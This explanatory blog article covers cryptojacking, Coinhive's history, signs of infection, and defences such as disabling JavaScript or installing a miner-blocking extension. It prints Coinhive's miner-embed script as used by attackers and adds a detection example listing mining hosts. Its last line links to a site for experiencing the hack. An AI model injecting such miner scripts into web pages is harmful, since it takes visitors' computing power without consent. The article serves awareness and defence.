It’s always challenging for the crypto community to secure their bitcoins and other cryptocurrencies from hackers. In our previous article, we spoke about Punycode to make you aware of malicious phishing websites and keep you from landing on them.

Here, in this article, I am going to introduce a technique called crypto-jacking, which hackers use to steal CPU processing power. They then use the stolen processing power to mine CPU-based cryptocurrencies like Monero [XMR].

What is cryptojacking?

Crypto-jacking is the process of illicitly borrowing a person’s processing power: hackers trick people into landing on a website that runs a hidden cryptocurrency mining script [code].

The piece of code injected into the webpage uses the visitor’s computational power in the background: while the user is browsing the page, the code steals computing power to mine cryptocurrencies. One important point: traditional hacks require you to download or click on something, while crypto-jacking only needs you to browse the web page.

Effects of crypto-jacking

Now that we have an idea about what cryptojacking is, here are some indicators that you need to be aware of to avoid falling prey to it.

  • Device slows down
  • CPU fan starts making noises
  • Batteries begin to overheat
  • An increase in the consumption of RAM 

These are the signs that you will experience when you land on cryptojacked sites.

How cryptojacking works!

Let’s say (god forbid) that you and I fell prey to one of these cryptojacking schemes. The injected malware code in the malicious website will leech a little bit of CPU power from you, a little bit from me, and a little bit from tens of thousands of other people who clicked on the site as well.

All this gathered mining power ends up creating a pool that is larger than a group of fair GPU miners. A mining pool with the highest amount of hash power has a high probability of solving the block, so miners who play fair and square lose their opportunity to get rewarded.

Even though cryptojacking is malicious, there are some significant points that differentiate it from other hacks.

  • Users are not directly losing money. They are losing CPU power.
  • Cryptojacking does not leave any long term damage.
  • It runs the CPU at maximum capacity for a short period of time.

That doesn’t sound so bad, does it? You have read about the dangers of Punycode, and cryptojacking might seem harmless by comparison. Well, this sort of thinking led an organization called Coinhive to build a business out of cryptojacking. Let me tell you more about this case.


Javascript and Coinhive

A hacker can borrow the harmful source code (shown below) from Coinhive to create a malicious website.

Here is the source code:

<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('B4ShXfNHJy3nEDclHBuc5i2bKJ3Sok8P');
miner.start();
</script>

First, the code will initiate Coinhive’s JavaScript library; second, the hacker will have to add his wallet address [B4ShXfNHJy3nEDclHBuc5i2bKJ3Sok8P] to the code.

Once a user who is unaware of cryptojacking clicks on the malicious website, the webpage begins to steal computational power, and the hackers illicitly earn cryptocurrencies, which are added to their wallet.

In most cases, cryptojacking is used to mine cryptocurrencies like Monero[XMR]; this is because its consensus algorithm is designed for CPU and GPU processing power.

So, how exactly does Coinhive work?

The basic idea behind Coinhive is to provide an alternative solution for ad revenue. Their vision is to offer hackers a means to steal your mining power, and consequently, your cryptocurrencies. 

For example:

Jarvis creates videos for his website. He decides that he doesn’t want to spend on advertising his website anymore, as it didn’t bring him enough revenue despite getting a lot of traffic. Jarvis turns to the dark side and resorts to cryptojacking.

He gets in touch with a hacker, Mr. X, who helps him merge Coinhive’s code with the source code. Once this is done, Jarvis begins to earn revenue via site visits in the form of cryptocurrencies. By resorting to cryptojacking, Jarvis doesn’t promote his video content and earn from it in an ethical way. Moreover, Jarvis will have to pay Coinhive 30% of his profits.

What about Mr. X, you ask? Well, as it goes, Jarvis and Mr. X made a deal based on a mutual understanding to gain from each other. These types of dealings have no fixed methods or relationships.

Image Source: Figure 1 | Malwarebytes doc

As Coinhive got more popular in cyberspace, hackers even started injecting the code into multiple websites that did not belong to them. Most of these hackers chose to mine Monero [XMR], which was profitable at the time.

Due to this (and a combination of scalability and interoperability issues), Monero [XMR] carried out a hard fork. In the fork process, the mining algorithm was completely changed, which resulted in the company’s failure. This update came back to haunt Coinhive, and it eventually shut down on March 8, 2019.

This might seem like a win for basic users. However, despite Coinhive closing shop, cryptojacking still persists on a lot of websites.

Not to worry though. I am going to provide you a solution to avoid falling prey to cryptojacking sites.

How to avoid Cryptojacking?

There are two possible solutions:

  • Turning off javascript (JS) in your browser
  • Installing ‘Miner Block’ chrome plugins

Turning off JavaScript in your browser: Turning off JS in the browser is a popular habit among backend developers. It helps them get past the animated ads coded in JavaScript. By following this practice, you can avoid falling prey to cryptojacking websites. This is a very effective step, as most mining malware is coded in JavaScript.

If you’d like to turn JavaScript off or on for all sites:

1. Click the Chrome menu on the top right-hand corner of your browser

2. Select Settings

3. Click Show advanced settings

4. Under the “Privacy” section, click the Content settings button.

5. In the “Javascript” section, select “Do not allow any site to run JavaScript” or “Allow all sites to run JavaScript (recommended)”

Follow the mentioned procedures to turn JavaScript off, or you can read the support document here. Moving further, let’s look at the plugin that helps you avoid cryptojacking.

Installing ‘Miner Block’ chrome plugin:

Image Source: Figure 3 | Chrome Web Store

Miner Block is a plugin available in the Chrome Web Store. The extension helps to prevent browser-based cryptocurrency mining scripts, which are loaded from the backend of the webpage, from cryptojacking your device. It is similar to ad-blockers, but it is far more focused on detecting mining scripts.
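As an added example (not from the original article and not Miner Block’s own code), here is one way a blocker can spot the Coinhive snippet shown earlier: scan a page’s HTML for scripts loaded from known mining hosts and for the `CoinHive` constructor call. The host list, function names, page URL and sample pages are assumptions constructed for illustration.

```javascript
// Added example: blocklist-style detection of in-browser miner scripts.
// BLOCKED_HOSTS is an illustrative assumption; real blockers ship far larger,
// regularly updated lists.
const BLOCKED_HOSTS = ['coin-hive.com', 'coinhive.com'];
// Matches the constructor call from the Coinhive snippet. Variable names such
// as "miner" are chosen by whoever wrote the page, so they are not matched.
const INLINE_MINER = /\bnew\s+CoinHive\.\w+\s*\(/;
const PAGE_URL = 'https://videos.example.test/watch'; // constructed page URL

// Exact host or subdomain match, so "coin-hive.com" inside a path is ignored.
function hostMatches(host, blocked) {
  const h = host.toLowerCase();
  return h === blocked || h.endsWith('.' + blocked);
}

function findMinerScripts(html, pageUrl) {
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const [, attrs, body] = m;
    const src = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(attrs);
    if (src) {
      let host = '';
      try {
        // Resolve relative and protocol-relative URLs against the page URL.
        host = new URL(src[1] ?? src[2] ?? src[3], pageUrl).hostname;
      } catch { /* unparsable src: treat as having no host */ }
      if (BLOCKED_HOSTS.some((b) => hostMatches(host, b))) {
        findings.push({ type: 'blocked-host', detail: host });
      }
    }
    if (INLINE_MINER.test(body)) {
      findings.push({ type: 'inline-miner-call', detail: body.trim().slice(0, 40) });
    }
  }
  return findings;
}

// Constructed sample pages (the site key is a placeholder).
const SAMPLE_INFECTED = `<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER'); miner.start();</script>`;
const SAMPLE_CLEAN = `<script src="/js/coin-hive.com/player.js"></script>
<script>player.start();</script>`;

console.log(findMinerScripts(SAMPLE_INFECTED, PAGE_URL));
console.log(findMinerScripts(SAMPLE_CLEAN, PAGE_URL));
```

A static scan like this only catches unobfuscated references; it will miss scripts that are renamed or proxied through a host not on the list.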

On another note, if you have already clicked on one of these cryptojacking sites, you can close the tab as soon as possible. However, I believe that prevention is better than cure. So, use the above-mentioned steps to avoid cryptojacking in the first place.

Wrapping it up!

Now that you have learned about cryptojacking and how to avoid it, you are far better equipped to face these hacks in cyberspace and actively go about your online habits.

If you’re interested in taking a closer look at cryptojacking websites, here is the link to experience the hack.
